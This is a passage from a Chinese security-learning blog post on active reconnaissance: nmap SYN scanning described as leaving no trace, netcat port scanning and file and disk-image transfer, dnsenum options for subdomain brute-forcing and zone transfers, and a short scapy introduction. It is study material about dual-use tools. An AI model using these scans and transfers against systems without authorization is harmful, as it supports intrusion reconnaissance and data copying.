<h3 id="半链接扫描-不会留下标记"><a href="#半链接扫描-不会留下标记" class="headerlink" title="半链接扫描  不会留下标记"></a>半链接扫描  不会留下标记</h3><p>nmap -sS 192.168.1.1 -p 80,443</p>
<h2 id="NC"><a href="#NC" class="headerlink" title="NC"></a>NC</h2><p>可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。</p>
<p>实现tcp udp端口监听，</p>
<p>可以实现端口扫描  机器间文件传输  网络测速</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">nc -nv  表示扫描的为ip不做域名解析</span><br><span class="line"></span><br><span class="line">-g&lt;网关&gt; 设置路由器跃程通信网关，最多可设置8个。</span><br><span class="line">-G&lt;指向器数目&gt; 设置来源路由指向器，其数值为4的倍数。</span><br><span class="line">-h 在线帮助。</span><br><span class="line">-i&lt;延迟秒数&gt; 设置时间间隔，以便传送信息及扫描通信端口。</span><br><span class="line">-l 使用监听模式，管控传入的资料。</span><br><span class="line">-n 直接使用IP地址，而不通过域名服务器。</span><br><span class="line">-o&lt;输出文件&gt; 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。</span><br><span class="line">-p&lt;通信端口&gt; 设置本地主机使用的通信端口。</span><br><span class="line">-r 乱数指定本地与远端主机的通信端口。</span><br><span class="line">-s&lt;来源地址&gt; 设置本地主机送出数据包的IP地址。</span><br><span class="line">-u 使用UDP传输协议。</span><br><span class="line">-v 显示指令执行过程。</span><br><span class="line">-w&lt;超时秒数&gt; 设置等待连线的时间。</span><br><span class="line">-z 使用0输入/输出模式，只在扫描通信端口时使用。</span><br></pre></td></tr></table></figure>


<h3 id="远程拷贝文件"><a href="#远程拷贝文件" class="headerlink" title="远程拷贝文件"></a><strong>远程拷贝文件</strong></h3><p>从server1拷贝文件到server2上。需要先在server2上，用nc激活监听。</p>
<p>server2：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@server2 ~]# nc -l 1234 &gt; 1234.txt</span><br></pre></td></tr></table></figure>
<p>server1：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@server1 ~]# cat abc.txt </span><br><span class="line">abc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txt</span><br><span class="line">[root@server1 ~]# nc -w 1 192.168.200.27 1234 &lt; abc.txt</span><br></pre></td></tr></table></figure>
<p>已经传送到server2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@server2 ~]# cat 1234.txt </span><br><span class="line">abc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txtabc.txt</span><br></pre></td></tr></table></figure>


<h3 id="克隆硬盘或分区"><a href="#克隆硬盘或分区" class="headerlink" title="克隆硬盘或分区"></a><strong>克隆硬盘或分区</strong></h3><p>操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。</p>
<p>克隆硬盘或分区的操作，不应在已经mount的的系统上进行。</p>
<p>#server2上进行类似的监听动作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@server2 ~]# nc -l -p 1234 | dd of&#x3D;&#x2F;dev&#x2F;sda</span><br></pre></td></tr></table></figure>
<p>#server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@server1 ~]# dd if&#x3D;&#x2F;dev&#x2F;sda | nc 192.168.200.27 1234</span><br></pre></td></tr></table></figure>


<h3 id="端口扫描-1"><a href="#端口扫描-1" class="headerlink" title="端口扫描"></a><strong>端口扫描</strong></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[root@backup ~]# nc -v -w 1 192.168.200.29 -z 20-30</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="聊天"><a href="#聊天" class="headerlink" title="聊天"></a><strong>聊天</strong></h3><p>server2:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@server2 ~]# nc -l 1234 </span><br><span class="line">hello!</span><br><span class="line">hi!</span><br></pre></td></tr></table></figure>
<p>server1:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@server1 ~]# nc  192.168.200.27 1234 </span><br><span class="line">hello!</span><br><span class="line">hi!</span><br></pre></td></tr></table></figure>
<p>扫描主机的端口开放  </p>
<p>nc -nv -w 3 -z 192.168.84.2 2-200</p>
<h1 id="dnsenum-使用文档"><a href="#dnsenum-使用文档" class="headerlink" title="dnsenum 使用文档"></a>dnsenum 使用文档</h1><hr>
<h2 id="软件介绍"><a href="#软件介绍" class="headerlink" title="软件介绍"></a>软件介绍</h2><p>dnsenum 是一款非常强大的 域名信息收集工具，<br>dnsenum的目的是尽可能收集一个域的信息，它能够通过谷歌或者字典文件猜测可能存在的域名，以及对一个网段进行反向查询。它可以<code>查询网站的主机地址信息</code>、<code>域名服务器</code>、<code>mx record（函件交换记录）</code>，在域名服务器上执行axfr请求，通过谷歌脚本得到扩展域名信息（google hacking），提取自域名并查询，计算C类地址并执行whois查询，执行反向查询，把地址段写入文件。</p>
<hr>
<h2 id="参数介绍"><a href="#参数介绍" class="headerlink" title="参数介绍"></a>参数介绍</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Usage:dnsenum.pl [Options] &lt;domain&gt;</span><br></pre></td></tr></table></figure>
<h3 id="基本参数"><a href="#基本参数" class="headerlink" title="基本参数:"></a>基本参数:</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>--dnsserve &lt;server&gt;</code></td>
<td align="left">使用指定的dns服务器查询域名的A NS 和 MX记录</td>
</tr>
<tr>
<td align="left"><code>--enum</code></td>
<td align="left">快捷参数,相当于<code>--threads 5 -s 15 -w</code>(启动5线程,谷歌搜索15条子域名,)</td>
</tr>
<tr>
<td align="left"><code>-h,--help</code></td>
<td align="left">显示帮助信息</td>
</tr>
<tr>
<td align="left"><code>--noreverse</code></td>
<td align="left">跳过反向查询[<a target="_blank" rel="noopener" href="https://www.zybuluo.com/sqzrcc/note/58953#fn:reverse">1]</a>的选项</td>
</tr>
<tr>
<td align="left"><code>--private</code></td>
<td align="left">等更新</td>
</tr>
<tr>
<td align="left"><code>--subfile &lt;file&gt;</code></td>
<td align="left">将所有有效子域写入[file]中</td>
</tr>
<tr>
<td align="left"><code>-t, --timeout &lt;value&gt;</code></td>
<td align="left">设置tcp 和 udp超时的秒数(默认10秒)</td>
</tr>
<tr>
<td align="left"><code>--thread &lt;value&gt;</code></td>
<td align="left">设置线程的数量,来执行不同的请求</td>
</tr>
<tr>
<td align="left"><code>-v,--verbose</code></td>
<td align="left">使用此参数,将显示所有过程以及错误信息</td>
</tr>
</tbody></table>
<h3 id="Google抓取参数"><a href="#Google抓取参数" class="headerlink" title="Google抓取参数"></a>Google抓取参数</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-p,--pages &lt;value&gt;</code></td>
<td align="left">从谷歌搜索的页面数量,默认5页,-s参数必须指定,如果无需使用google抓取,则值指定为0</td>
</tr>
<tr>
<td align="left"><code>-s, --scrap &lt;value&gt;</code></td>
<td align="left">从谷歌搜索子域名的最大数量,默认15条</td>
</tr>
</tbody></table>
<h3 id="爆破参数"><a href="#爆破参数" class="headerlink" title="爆破参数"></a>爆破参数</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-f, --file &lt;file&gt;</code></td>
<td align="left">从指定的文件中读取子域名进行暴力破解</td>
</tr>
<tr>
<td align="left"><code>-r, --recursion</code></td>
<td align="left">递归子域名,暴力破解所有发现的子域名的ns记录</td>
</tr>
<tr>
<td align="left">`-u, –update &lt;a</td>
<td align="left">g</td>
</tr>
</tbody></table>
<h4 id="udate-参数列表"><a href="#udate-参数列表" class="headerlink" title="udate 参数列表"></a>udate 参数列表</h4><ul>
<li><code>a(all)</code> 更新使用所有的结果</li>
<li><code>g</code> 更新只使用google搜出的有效结果</li>
<li><code>r</code> 更新只使用反向查询出的有效结果</li>
<li><code>z</code> 更新只使用区域转换的有效结果</li>
</ul>
<h3 id="whois相关参数"><a href="#whois相关参数" class="headerlink" title="whois相关参数"></a>whois相关参数</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-d,--delay &lt;value&gt;</code></td>
<td align="left">?</td>
</tr>
<tr>
<td align="left"><code>-w,--whois</code></td>
<td align="left">在C段范围里执行whois查询 <code>**Waring:**</code>这将会产生非常大的网络范围以及花费很多时间执行反向查找</td>
</tr>
</tbody></table>
<h3 id="反向查找参数"><a href="#反向查找参数" class="headerlink" title="反向查找参数"></a>反向查找参数</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-e, --exclude &lt;regexp&gt;</code></td>
<td align="left">将反向查找的结果排除PTR记录与正则表达式匹配的内容,有用的无效主机名</td>
</tr>
</tbody></table>
<h3 id="输出参数"><a href="#输出参数" class="headerlink" title="输出参数"></a>输出参数</h3><table>
<thead>
<tr>
<th align="left">参数命令</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-o --output &lt;file&gt;</code></td>
<td align="left">以xml格式化方式输出,输出文件可以导入到<a target="_blank" rel="noopener" href="http://www.gremwell.com/">MagicTree</a>[<a target="_blank" rel="noopener" href="https://www.zybuluo.com/sqzrcc/note/58953#fn:magictree">1]</a></td>
</tr>
</tbody></table>
<hr>
<h2 id="scapy"><a href="#scapy" class="headerlink" title="scapy"></a>scapy</h2><p>Scapy是一个Python程序，使用户能够发送，嗅探和剖析并伪造网络数据包。 此功能允许构建可以探测，扫描或攻击网络的工具。 换句话说，Scapy是一个功能强大的交互式数据包操作程序。 它能够伪造或解码大量协议的数据包，通过线路发送，捕获它们，匹配请求和回复等等。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">拾音</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://blackfootedcat.github.io/2021/07/15/%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">https://blackfootedcat.github.io/2021/07/15/%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://blackfootedcat.github.io" target="_blank">拾音</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a></div><div class="post_share"><div class="social-share" data-image="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715113016809.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/img/wechat.png" target="_blank"><img class="post-qr-code-img" src="/img/wechat.png" alt="wechat"/></a><div class="post-qr-code-desc">wechat</div></li><li class="reward-item"><a href="/img/alipay.jpg" target="_blank"><img class="post-qr-code-img" src="/img/alipay.jpg" alt="alipay"/></a><div class="post-qr-code-desc">alipay</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/07/15/UML/"><img class="prev-cover" src="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715113214211.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">软件工程</div></div></a></div><div class="next-post pull-right"><a href="/2021/07/15/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><img class="next-cover" src="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715112811650.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">被动信息收集</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2021/07/15/信息收集/" title="被动信息收集"><img class="cover" src="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715112811650.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-15</div><div class="title">被动信息收集</div></div></a></div><div><a href="/2021/07/15/被动信息收集/" title="被动信息收集"><img class="cover" src="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715112811650.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-15</div><div class="title">被动信息收集</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">二、主动信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#traceroute"><span class="toc-number">1.1.</span> <span class="toc-text">traceroute</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ARPING"><span class="toc-number">1.2.</span> <span class="toc-text">ARPING</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#netdiscover"><span class="toc-number">1.3.</span> <span class="toc-text">netdiscover</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HPING3"><span class="toc-number">1.4.</span> <span class="toc-text">HPING3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%98%B2%E7%81%AB%E5%A2%99%E6%B5%8B%E8%AF%95"><span class="toc-number">1.4.1.</span> <span class="toc-text">#  防火墙测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.4.2.</span> <span class="toc-text"># 端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Idle%E6%89%AB%E6%8F%8F"><span class="toc-number">1.4.3.</span> <span class="toc-text"># Idle扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB"><span class="toc-number">1.4.4.</span> <span class="toc-text"># 拒绝服务攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93"><span class="toc-number">1.4.5.</span> <span class="toc-text"># 文件传输</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%A8%E9%A9%AC%E5%8A%9F%E8%83%BD"><span class="toc-number">1.4.6.</span> <span class="toc-text"># 木马功能</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap"><span class="toc-number">1.5.</span> <span class="toc-text">Nmap</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A8%E8%BF%9E%E6%8E%A5%E6%89%AB%E6%8F%8F"><span class="toc-number">1.5.1.</span> <span class="toc-text">全连接扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%8A%E9%93%BE%E6%8E%A5%E6%89%AB%E6%8F%8F-%E4%B8%8D%E4%BC%9A%E7%95%99%E4%B8%8B%E6%A0%87%E8%AE%B0"><span class="toc-number">1.5.2.</span> <span class="toc-text">半链接扫描  不会留下标记</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NC"><span class="toc-number">1.6.</span> <span class="toc-text">NC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%8B%B7%E8%B4%9D%E6%96%87%E4%BB%B6"><span class="toc-number">1.6.1.</span> <span class="toc-text">远程拷贝文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%8B%E9%9A%86%E7%A1%AC%E7%9B%98%E6%88%96%E5%88%86%E5%8C%BA"><span class="toc-number">1.6.2.</span> <span class="toc-text">克隆硬盘或分区</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F-1"><span class="toc-number">1.6.3.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%81%8A%E5%A4%A9"><span class="toc-number">1.6.4.</span> <span class="toc-text">聊天</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#dnsenum-%E4%BD%BF%E7%94%A8%E6%96%87%E6%A1%A3"><span class="toc-number">2.</span> <span class="toc-text">dnsenum 使用文档</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BD%AF%E4%BB%B6%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.1.</span> <span class="toc-text">软件介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.2.</span> <span class="toc-text">参数介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.1.</span> <span class="toc-text">基本参数:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Google%E6%8A%93%E5%8F%96%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.2.</span> <span class="toc-text">Google抓取参数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%88%86%E7%A0%B4%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.3.</span> <span class="toc-text">爆破参数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#udate-%E5%8F%82%E6%95%B0%E5%88%97%E8%A1%A8"><span class="toc-number">2.2.3.1.</span> <span class="toc-text">udate 参数列表</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#whois%E7%9B%B8%E5%85%B3%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.4.</span> <span class="toc-text">whois相关参数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%90%91%E6%9F%A5%E6%89%BE%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.5.</span> <span class="toc-text">反向查找参数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BE%93%E5%87%BA%E5%8F%82%E6%95%B0"><span class="toc-number">2.2.6.</span> <span class="toc-text">输出参数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#scapy"><span class="toc-number">2.3.</span> <span class="toc-text">scapy</span></a></li></ol></li></ol></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By 拾音</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text"><a href=""><img class="icp-icon" src="/img/icp.png"><span>备案号：------</span></a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">简</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    let initData = {
      el: '#vcomment',
      appId: 'QoWLJwtWDLjkgk4Yrsjh69Ma-gzGzoHsz',
      appKey: 'FXptftKQP6ILyosLK4NywPMy',
      placeholder: '有问题的话可以留下邮箱方便我联系你哦',
      avatar: 'monsterid',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'zh-CN',
      recordIP: true,
      serverURLs: '',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: false,
      path: window.location.pathname,
    }

    if (true) { 
      initData.requiredFields= ('nick,mail'.split(','))
    }
    
    if (false) {
      const otherData = false
      initData = Object.assign(initData, otherData)
    }
    
    const valine = new Valine(initData)
  }

  if (typeof Valine === 'function') initValine() 
  else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}

if ('Valine' === 'Valine' || !true) {
  if (true) btf.loadComment(document.getElementById('vcomment'),loadValine)
  else setTimeout(loadValine, 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-nest.min.js"></script><script id="click-show-text" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-show-text.min.js" data-mobile="false" data-text="富强,民主,文明,和谐,团结,友善" data-fontsize="15px" data-random="false" async="async"></script></div></body></html>